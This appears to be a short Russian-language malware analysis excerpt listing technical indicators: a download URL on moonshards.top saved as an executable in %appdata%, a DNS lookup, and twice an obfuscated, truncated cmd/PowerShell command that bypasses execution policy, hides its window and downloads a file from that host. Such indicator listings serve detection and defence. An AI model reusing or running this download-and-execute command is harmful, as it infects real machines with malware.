Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powERSHe^l^l.^e^xE^ -e^xe^cU^TIo^Np^OLi^cY^ b^YP^asS -no^pROFiLE^ -WiN^dO^W^s^TyLe hiDd^EN ^(^N^ew^-Obje^Ct systE^m^.^nEt.wE^BcLiE^nT)^.^d^oWNlo^ADfi^Le(^'http://moonshards....
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "powERSHe^l^l.^e^xE^ -e^xe^cU^TIo^Np^OLi^cY^ b^YP^asS -no^pROFiLE^ -WiN^dO^W^s^TyLe hiDd^EN ^(^N^ew^-Obje^Ct systE^m^.^nEt.wE^BcLiE^nT)^.^d^oWNlo^ADfi^Le(^'http://moonshards....' (со скрытым окном)